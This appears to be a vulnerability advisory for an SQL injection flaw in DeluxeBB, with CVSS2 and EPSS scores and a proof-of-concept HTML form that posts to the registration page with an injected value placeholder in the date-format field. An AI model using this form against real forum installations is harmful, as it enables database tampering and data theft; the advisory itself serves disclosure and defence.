6.8 Medium
CVSS2
Access Vector
NETWORK
Access Complexity
MEDIUM
Authentication
NONE
Confidentiality Impact
PARTIAL
Integrity Impact
PARTIAL
Availability Impact
PARTIAL
AV:N/AC:M/Au:N/C:P/I:P/A:P
0.004 Low
EPSS
Percentile
69.1%
High-Tech Bridge SA Security Research Lab has discovered vulnerability in DeluxeBB which could be exploited to execute arbitrary SQL commands in application`s database.
<form action=“http://deluxebb/misc.php?sub=register” method=“post” name=“main” >
<input type=“hidden” name=“name” value=“pentester” />
<input type=“hidden” name=“pass” value=“pentester” />
<input type=“hidden” name=“pass2” value=“pentester” />
<input type=“hidden” name=“email” value="[email protected]" />
<input type=“hidden” name=“hideemail” value=“0” />
<input type=“hidden” name=“languagex” value=“default” />
<input type=“hidden” name=“xthetimeoffset” value=“0” />
<input type=“hidden” name=“xthetimeformat” value=“24” />
<input type=“hidden” name=“xthedateformat” value=“'SQL_CODE_HERE” />
<input type=“hidden” value=“” name=“redirect” />
<input type=“submit” value=“Register” name=“submit” />
</form>